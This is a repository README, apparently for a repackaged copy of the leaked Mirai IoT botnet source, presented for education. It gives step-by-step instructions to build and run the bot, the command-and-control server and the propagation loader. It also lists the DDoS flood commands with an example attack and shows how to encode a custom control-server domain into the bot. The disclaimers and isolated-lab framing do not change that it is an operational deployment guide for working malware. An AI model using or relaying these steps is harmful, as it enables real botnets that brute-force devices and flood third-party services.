Historical IoT Botnet Source Code for Security Research and Education in Isolated Environments
THIS SOFTWARE IS FOR EDUCATIONAL AND SECURITY RESEARCH PURPOSES ONLY
π¨ READ THIS CAREFULLY BEFORE PROCEEDING π¨
- β LEGAL USE: Security research, penetration testing training, malware analysis, and network defense education in COMPLETELY ISOLATED lab environments with devices YOU OWN
- β ILLEGAL USE: Operating botnets, attacking systems without authorization, unauthorized access to computers, disrupting services, or any malicious activity
- βοΈ LEGAL CONSEQUENCES: Unauthorized use may result in criminal prosecution, imprisonment, and significant fines under laws including the Computer Fraud and Abuse Act (CFAA) and similar laws worldwide
- π YOUR RESPONSIBILITY: By using this code, you accept full legal responsibility for your actions
IF YOU DON'T UNDERSTAND THESE WARNINGS, DO NOT PROCEED
- What is Mirai?
- Prerequisites
- Installation
- Usage
- Architecture
- Configuration
- Troubleshooting
- Learning Resources
- Contributing
- Credits
Mirai is a historically significant IoT botnet that emerged in 2016 and caused massive Distributed Denial of Service (DDoS) attacks, including:
- Krebs on Security - Record-breaking 620 Gbps DDoS attack
- Dyn DNS - Took down major websites (Twitter, Reddit, Netflix, etc.)
- OVH - 1.1 Tbps attack, one of the largest at the time
The source code was leaked publicly by "Anna-senpai" in September 2016 and became a reference for:
- π IoT Security Research - Understanding IoT vulnerabilities
- π Cybersecurity Education - Teaching about botnet architecture
- π‘οΈ Defense Development - Building detection and mitigation systems
- π Malware Analysis - Studying propagation and attack techniques
- Multi-Architecture Support: Compiles for ARM, MIPS, x86, PowerPC, SPARC, and more
- Telnet Brute-Force: Scans and compromises IoT devices with default credentials
- DDoS Capabilities: Multiple attack vectors (UDP flood, TCP SYN, HTTP flood, GRE, etc.)
- Self-Propagation: Automatically spreads to vulnerable devices
- C&C Infrastructure: Command and Control server for managing bots
- Operating System: Linux (Ubuntu 20.04+ or Debian 10+ recommended)
- Memory: Minimum 2GB RAM
- Disk Space: At least 1GB free
- Network: Isolated network environment (virtual machines, VLANs, or air-gapped)
# Core dependencies
- gcc (7.0+)
- golang (1.11+)
- electric-fence
- mysql-server (5.7+ or MariaDB 10.3+)
- mysql-client
- git
- make
- build-essential
# Optional for Docker setup
- docker (20.10+)
- docker-compose (1.29+)Docker provides complete isolation and is the safest and easiest way to test Mirai.
# Ubuntu/Debian
sudo apt-get update
sudo apt-get install -y docker.io docker-compose
# Start Docker
sudo systemctl start docker
sudo systemctl enable docker
# Add your user to docker group (logout/login after this)
sudo usermod -aG docker $USERgit clone https://github.com/Linkatplug/Mirai-Source-Code.git
cd Mirai-Source-Code# Build and start all containers
docker-compose up -d --build
# Check status
docker-compose ps
# View logs
docker-compose logs -f cnctelnet localhost 23
# Default credentials:
# Username: admin
# Password: password123# Stop all services
docker-compose down
# Remove all data (complete cleanup)
docker-compose down -vβ For detailed Docker instructions, see DOCKER.md
For a deeper understanding of the system, you can install and run components manually.
# Update system
sudo apt-get update
# Install required packages
sudo apt-get install -y \
gcc \
golang-go \
electric-fence \
mysql-server \
mysql-client \
git \
build-essential \
net-tools
# Verify installations
gcc --version # Should be 7.x or higher
go version # Should be 1.11 or higher
mysql --version # Should be 5.7 or highergit clone https://github.com/Linkatplug/Mirai-Source-Code.git
cd Mirai-Source-Code# Start MySQL service
sudo systemctl start mysql
sudo systemctl enable mysql
# Create database and tables
sudo mysql < scripts/db.sql
# Create admin user
sudo mysql mirai << EOF
INSERT INTO users VALUES (NULL, 'admin', 'password123', 0, 0, 0, 0, -1, 1, 30, '');
INSERT INTO users VALUES (NULL, 'testuser', 'test123', 0, 0, 0, 0, -1, 1, 30, '');
EOF
# Verify database setup
sudo mysql mirai -e "SELECT username FROM users;"Edit the database credentials in mirai/cnc/main.go:
nano mirai/cnc/main.goUpdate these constants:
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "" // Your MySQL root password
const DatabaseTable string = "mirai"cd mirai
# Build in debug mode (recommended for learning)
./build.sh debug telnet
# This creates in debug/ folder:
# - cnc (Command & Control server)
# - mirai.dbg (Bot for x86 with debug output)
# - mirai.* (Cross-compiled bots for various architectures)
# - enc (Configuration encoder tool)
# - scanListen (Scan result listener)cd ../loader
./build.sh
# This creates:
# - loader (Binary loader for compromised devices)β For step-by-step installation guide, see QUICKSTART.md
The Command & Control (CNC) server manages all connected bots and coordinates attacks.
cd mirai/debug
# Run CNC server (requires MySQL to be running)
./cnc
# You should see:
# Mysql DB opened
# Listening on port :23 (CNC)
# Listening on port :101 (API)Open a new terminal and connect via telnet:
telnet localhost 23
# Login with default credentials:
# Username: admin
# Password: password123Once logged in, you can use these commands:
? - Show help
bots - List connected bots
botcount - Show number of connected bots
clear - Clear screen
# Attack commands (only use on systems you own!)
udp [ip] [duration] [size] [port] - UDP flood
tcp [ip] [duration] [size] [port] [flags] - TCP flood
http [url] [duration] - HTTP flood
vse [ip] [duration] - Valve Source Engine flood
dns [ip] [duration] - DNS flood
greip [ip] [duration] - GRE IP flood
greeth [ip] [duration] - GRE Ethernet flood
To test bot connectivity:
cd mirai/debug
# Run a bot (it will try to connect to CNC)
./mirai.dbg
# In your CNC telnet session, type:
bots
# You should see your bot listed!# In CNC telnet session:
# Example: UDP flood your test server for 30 seconds
udp 192.168.1.100 30 512 80
# Monitor the attack from another terminal
sudo tcpdump -i any host 192.168.1.100The bot uses XOR-encoded configuration strings. To encode custom values:
cd mirai/debug
# Encode a domain name
./enc string "my-cnc-server.com"
# Output will be something like:
# XOR'ing 17 bytes of data...
# \x44\x57\x41\x41\x4A\x41\x44\x43...
# Copy this to bot/table.c in the TABLE_CNC_DOMAIN entryβββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Mirai Botnet Architecture β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β ββββββββββββββββ βββββββββββββββββββ β
β β Infected Bot ββββββββββΆβ CNC Server β β
β β (IoT Device)βββββββββββ (Command & β β
β ββββββββ¬ββββββββ β Control) β β
β β ββββββββββ¬βββββββββ β
β β β β
β β Reports ββββΌβββββββ β
β β Vulnerable β MySQL β β
β β Devices βDatabase β β
β β βββββββββββ β
β β β
β βΌ β
β ββββββββββββββββ βββββββββββββββββββ β
β β Scanner ββββββββββΆβ Loader β β
β β (Port 48101)β β (Infects New β β
β ββββββββββββββββ β Devices) β β
β βββββββββββββββββββ β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Mirai-Source-Code/
β
βββ mirai/ # Main botnet code
β βββ bot/ # Bot malware (C)
β β βββ main.c # Entry point
β β βββ attack*.c # DDoS attack implementations
β β βββ scanner.c # Telnet/SSH brute-force scanner
β β βββ killer.c # Kills competing malware
β β βββ table.c/h # Obfuscated configuration
β β βββ resolv.c # DNS resolver
β β
β βββ cnc/ # Command & Control (Go)
β β βββ main.go # CNC server
β β βββ admin.go # Admin interface
β β βββ attack.go # Attack coordination
β β βββ database.go # MySQL interaction
β β βββ bot.go # Bot management
β β
β βββ tools/ # Utility tools
β βββ scanListen.go # Scan result listener
β
βββ loader/ # Loader for propagation (C)
β βββ src/
β βββ main.c # Loader entry point
β βββ server.c # HTTP server for binaries
β βββ binary.c # Binary management
β βββ telnet_info.c # Telnet credential handling
β
βββ scripts/ # Setup scripts
β βββ db.sql # MySQL database schema
β βββ cross-compile.sh # Cross-compilation helper
β
βββ QUICKSTART.md # Quick start guide
βββ DOCKER.md # Docker setup guide
βββ ANALYSIS.md # Technical analysis
βββ README.md # This file
The bot stores configuration in XOR-obfuscated strings:
// Key configuration entries:
TABLE_CNC_DOMAIN // Domain/IP of CNC server
TABLE_CNC_PORT // CNC server port (default: 23)
TABLE_SCAN_CB_DOMAIN // Scan callback domain
TABLE_SCAN_CB_PORT // Scan callback port (default: 48101)To change configuration:
- Use the
enctool to encode new values - Update values in
bot/table.c - Rebuild the bot
// Database settings
const DatabaseAddr string = "127.0.0.1" // MySQL server IP
const DatabaseUser string = "root" // MySQL username
const DatabasePass string = "" // MySQL password
const DatabaseTable string = "mirai" // Database name
// Server settings
const Tel_Port string = "23" // Telnet port
const Api_Port string = "101" // API port# Check if MySQL is running
sudo systemctl status mysql
# Check if port 23 is available
sudo netstat -tulpn | grep :23
# If port is in use, kill the process or change the port
sudo lsof -ti:23 | xargs kill -9
# Check MySQL connection
mysql -u root -p -e "SHOW DATABASES;"
# View CNC logs
./debug/cnc# Check CNC domain configuration
grep TABLE_CNC_DOMAIN mirai/bot/table.c
# Test DNS resolution
ping -c 1 cnc.changeme.com
# Test telnet connection manually
telnet localhost 23
# Verify bot is using correct IP/domain
# Consider using 127.0.0.1 or localhost for testing# Install missing dependencies
sudo apt-get install gcc golang electric-fence build-essential
# Check Go environment
go env
# For cross-compilation errors (expected if cross-compilers not installed)
# You can safely ignore errors for architectures you don't need
# Build only for x86 (debug mode)
cd mirai
gcc -std=c99 -DDEBUG -DMIRAI_TELNET bot/*.c -static -o debug/mirai.dbg# Start MySQL service
sudo systemctl start mysql
# Reset MySQL root password if needed
sudo mysql
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'your_password';
FLUSH PRIVILEGES;
EXIT;
# Verify database exists
sudo mysql -e "SHOW DATABASES;"
# Recreate database
sudo mysql < scripts/db.sql- QUICKSTART.md - 30-minute quick start guide
- DOCKER.md - Complete Docker setup instructions
- ANALYSIS.md - Deep technical analysis of the code
- ForumPost.md - Original leak post with technical details
Understanding Mirai:
- Krebs on Security: KrebsOnSecurity Hit with Record DDoS
- Wikipedia: 2016 Dyn Cyberattack
- MalwareMustDie Analysis
IoT Security:
- OWASP IoT Security Project
- NIST IoT Cybersecurity Guidelines
- IoT Security Foundation Resources
Defense Tools:
- Fail2ban - Brute-force protection
- Suricata/Snort - Intrusion detection
- iptables/nftables - Firewall rules
- Wireshark - Network traffic analysis
Contributions are welcome to improve educational aspects of this repository:
β Welcome Contributions:
- Documentation improvements
- Bug fixes in build scripts
- Better explanations and tutorials
- Defense/detection examples
- Educational exercises
β NOT Welcome:
- Evasion techniques
- Improved attack capabilities
- Obfuscation improvements
- Anti-detection features
Please open an issue first to discuss significant changes.
- Anna-senpai - Original author who leaked the source code (original post)
- Security Research Community - For analysis and documentation
- IoT Security Researchers - For defense improvements
See LICENSE.md for details.
This code is provided "as is" for educational and research purposes only. The authors and contributors are not responsible for any misuse or damage caused by this software.
USE AT YOUR OWN RISK - EDUCATIONAL PURPOSES ONLY
By downloading, installing, or using this software, you agree to:
- Use it ONLY for legal security research and education
- Operate it ONLY in completely isolated environments
- Test ONLY on systems you own or have explicit written permission to test
- NEVER use it to attack, disrupt, or damage any systems
- Accept FULL LEGAL RESPONSIBILITY for your actions
Violations of computer crime laws can result in:
- Federal criminal charges
- Years of imprisonment
- Significant fines
- Permanent criminal record
- Loss of professional certifications and career
If you don't fully understand these warnings and the legal implications, DO NOT USE THIS SOFTWARE.
π For Education. For Research. For Defense. π
"The best defense is understanding the attack"
Stay Legal. Stay Ethical. Stay Safe.